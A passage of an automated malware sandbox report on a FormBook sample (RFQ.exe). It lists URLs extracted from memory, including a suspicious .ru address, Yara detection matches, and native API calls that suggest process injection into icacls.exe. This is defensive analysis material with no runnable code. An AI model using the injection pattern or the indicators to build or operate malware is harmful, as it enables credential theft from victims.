            Source: KdNqCjDpwdLOuI.exe, 0000000A.00000002.4433484681.00000000050AF000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.naglissere.ru/bnz5/
            Source: icacls.exe, 00000008.00000002.4432678458.000000000572E000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.000000000442E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/
            Source: icacls.exe, 00000008.00000002.4432678458.000000000572E000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.000000000442E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.searchvity.com/?dn=
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004C30000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003930000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: icacls.exe, 00000008.00000002.4432678458.0000000004DC2000.00000004.10000000.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000002.4431977978.0000000003AC2000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033h
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: icacls.exe, 00000008.00000002.4431220100.00000000032DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: icacls.exe, 00000008.00000003.2333207064.000000000822F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: icacls.exe, 00000008.00000002.4434649977.00000000082F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: RFQ.exe, DriversSelection.csLarge array initialization: : array initializer size 661782
            Source: 0.2.RFQ.exe.2c801f4.7.raw.unpack, SQL.csLarge array initialization: : array initializer size 13797
            Source: 0.2.RFQ.exe.73c0000.10.raw.unpack, SQL.csLarge array initialization: : array initializer size 13797
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: RFQ.exe
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0042AA43 NtClose,5_2_0042AA43
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72B60 NtClose,LdrInitializeThunk,5_2_01A72B60
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01A72DF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01A72C70
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A735C0 NtCreateMutant,LdrInitializeThunk,5_2_01A735C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A74340 NtSetContextThread,5_2_01A74340
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A74650 NtSuspendThread,5_2_01A74650
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72BA0 NtEnumerateValueKey,5_2_01A72BA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72B80 NtQueryInformationFile,5_2_01A72B80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72BE0 NtQueryValueKey,5_2_01A72BE0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72BF0 NtAllocateVirtualMemory,5_2_01A72BF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72AB0 NtWaitForSingleObject,5_2_01A72AB0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72AF0 NtWriteFile,5_2_01A72AF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72AD0 NtReadFile,5_2_01A72AD0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72DB0 NtEnumerateKey,5_2_01A72DB0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72DD0 NtDelayExecution,5_2_01A72DD0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72D30 NtUnmapViewOfSection,5_2_01A72D30
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72D00 NtSetInformationFile,5_2_01A72D00
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72D10 NtMapViewOfSection,5_2_01A72D10
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72CA0 NtQueryInformationToken,5_2_01A72CA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72CF0 NtOpenProcess,5_2_01A72CF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72CC0 NtQueryVirtualMemory,5_2_01A72CC0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72C00 NtQueryInformationProcess,5_2_01A72C00
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72C60 NtCreateKey,5_2_01A72C60
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72FA0 NtQuerySection,5_2_01A72FA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72FB0 NtResumeThread,5_2_01A72FB0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72F90 NtProtectVirtualMemory,5_2_01A72F90
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72FE0 NtCreateFile,5_2_01A72FE0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72F30 NtCreateSection,5_2_01A72F30
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72F60 NtCreateProcessEx,5_2_01A72F60
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72EA0 NtAdjustPrivilegesToken,5_2_01A72EA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72E80 NtReadVirtualMemory,5_2_01A72E80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72EE0 NtQueueApcThread,5_2_01A72EE0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A72E30 NtWriteVirtualMemory,5_2_01A72E30
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A73090 NtSetValueKey,5_2_01A73090
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A73010 NtOpenDirectoryObject,5_2_01A73010
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A739B0 NtGetContextThread,5_2_01A739B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A73D10 NtOpenProcessToken,5_2_01A73D10
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A73D70 NtOpenThread,5_2_01A73D70
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03924340 NtSetContextThread,LdrInitializeThunk,8_2_03924340
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03924650 NtSuspendThread,LdrInitializeThunk,8_2_03924650
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922BA0 NtEnumerateValueKey,LdrInitializeThunk,8_2_03922BA0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922BF0 NtAllocateVirtualMemory,LdrInitializeThunk,8_2_03922BF0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922BE0 NtQueryValueKey,LdrInitializeThunk,8_2_03922BE0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922B60 NtClose,LdrInitializeThunk,8_2_03922B60
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922AD0 NtReadFile,LdrInitializeThunk,8_2_03922AD0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922AF0 NtWriteFile,LdrInitializeThunk,8_2_03922AF0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922FB0 NtResumeThread,LdrInitializeThunk,8_2_03922FB0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922FE0 NtCreateFile,LdrInitializeThunk,8_2_03922FE0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922F30 NtCreateSection,LdrInitializeThunk,8_2_03922F30
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922E80 NtReadVirtualMemory,LdrInitializeThunk,8_2_03922E80
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922EE0 NtQueueApcThread,LdrInitializeThunk,8_2_03922EE0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922DD0 NtDelayExecution,LdrInitializeThunk,8_2_03922DD0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03922DF0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922D10 NtMapViewOfSection,LdrInitializeThunk,8_2_03922D10
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922D30 NtUnmapViewOfSection,LdrInitializeThunk,8_2_03922D30
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922CA0 NtQueryInformationToken,LdrInitializeThunk,8_2_03922CA0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03922C70
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922C60 NtCreateKey,LdrInitializeThunk,8_2_03922C60
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039235C0 NtCreateMutant,LdrInitializeThunk,8_2_039235C0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_039239B0 NtGetContextThread,LdrInitializeThunk,8_2_039239B0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922B80 NtQueryInformationFile,8_2_03922B80
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922AB0 NtWaitForSingleObject,8_2_03922AB0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922F90 NtProtectVirtualMemory,8_2_03922F90
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922FA0 NtQuerySection,8_2_03922FA0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922F60 NtCreateProcessEx,8_2_03922F60
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922EA0 NtAdjustPrivilegesToken,8_2_03922EA0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922E30 NtWriteVirtualMemory,8_2_03922E30
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922DB0 NtEnumerateKey,8_2_03922DB0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922D00 NtSetInformationFile,8_2_03922D00
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922CC0 NtQueryVirtualMemory,8_2_03922CC0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922CF0 NtOpenProcess,8_2_03922CF0
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03922C00 NtQueryInformationProcess,8_2_03922C00
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03923090 NtSetValueKey,8_2_03923090
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03923010 NtOpenDirectoryObject,8_2_03923010
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03923D10 NtOpenProcessToken,8_2_03923D10
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_03923D70 NtOpenThread,8_2_03923D70
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030E7310 NtClose,8_2_030E7310
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030E7270 NtDeleteFile,8_2_030E7270
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030E7180 NtReadFile,8_2_030E7180
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030E7020 NtCreateFile,8_2_030E7020
            Source: C:\Windows\SysWOW64\icacls.exeCode function: 8_2_030E7460 NtAllocateVirtualMemory,8_2_030E7460
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_01223AC00_2_01223AC0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_012278C00_2_012278C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_051800400_2_05180040
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_05180DF10_2_05180DF1
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_05180E000_2_05180E00
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_072E09700_2_072E0970
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_072E4BF80_2_072E4BF8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_072E4BF70_2_072E4BF7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_072FD6A80_2_072FD6A8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077B77180_2_077B7718
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077B97A00_2_077B97A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077B6DF00_2_077B6DF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077B55F00_2_077B55F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077B7C280_2_077B7C28
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077B7C180_2_077B7C18
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077BCA680_2_077BCA68
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_077B51B80_2_077B51B8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_08F246380_2_08F24638
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_08F2C7F30_2_08F2C7F3
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_08F268680_2_08F26868
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_004010F85_2_004010F8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040F8835_2_0040F883
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_004011005_2_00401100
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040D9035_2_0040D903
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_004029C05_2_004029C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_004012E05_2_004012E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_004034B05_2_004034B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00401D085_2_00401D08
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00401D105_2_00401D10
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040251E5_2_0040251E
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040F65A5_2_0040F65A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040F6635_2_0040F663
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0042CE735_2_0042CE73
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_004026D05_2_004026D0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00415EFE5_2_00415EFE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_0040477F5_2_0040477F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_00415F035_2_00415F03
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF41A25_2_01AF41A2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B001AA5_2_01B001AA
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF81CC5_2_01AF81CC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A301005_2_01A30100
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADA1185_2_01ADA118
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC81585_2_01AC8158
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD20005_2_01AD2000
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4E3F05_2_01A4E3F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B003E65_2_01B003E6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFA3525_2_01AFA352
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC02C05_2_01AC02C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE02745_2_01AE0274
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B005915_2_01B00591
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A405355_2_01A40535
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEE4F65_2_01AEE4F6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE44205_2_01AE4420
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF24465_2_01AF2446
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3C7C05_2_01A3C7C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A407705_2_01A40770
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A647505_2_01A64750
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5C6E05_2_01A5C6E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A429A05_2_01A429A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B0A9A65_2_01B0A9A6
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A569625_2_01A56962
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A268B85_2_01A268B8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6E8F05_2_01A6E8F0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4A8405_2_01A4A840
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A428405_2_01A42840
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF6BD75_2_01AF6BD7
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFAB405_2_01AFAB40
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3EA805_2_01A3EA80
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A58DBF5_2_01A58DBF
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A3ADE05_2_01A3ADE0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4AD005_2_01A4AD00
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADCD1F5_2_01ADCD1F
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE0CB55_2_01AE0CB5
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30CF25_2_01A30CF2
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40C005_2_01A40C00
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABEFA05_2_01ABEFA0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4CFE05_2_01A4CFE0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A32FC85_2_01A32FC8
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A82F285_2_01A82F28
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A60F305_2_01A60F30
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE2F305_2_01AE2F30
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AB4F405_2_01AB4F40
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52E905_2_01A52E90
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFCE935_2_01AFCE93
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFEEDB5_2_01AFEEDB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFEE265_2_01AFEE26
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40E595_2_01A40E59
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A4B1B05_2_01A4B1B0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A7516C5_2_01A7516C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2F1725_2_01A2F172
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B0B16B5_2_01B0B16B
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF70E95_2_01AF70E9
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AFF0E05_2_01AFF0E0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AEF0CC5_2_01AEF0CC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A470C05_2_01A470C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A8739A5_2_01A8739A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AF132D5_2_01AF132D
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A2D34C5_2_01A2D34C
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A452A05_2_01A452A0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE12ED5_2_01AE12ED
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5B2C05_2_01A5B2C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADD5B05_2_01ADD5B0
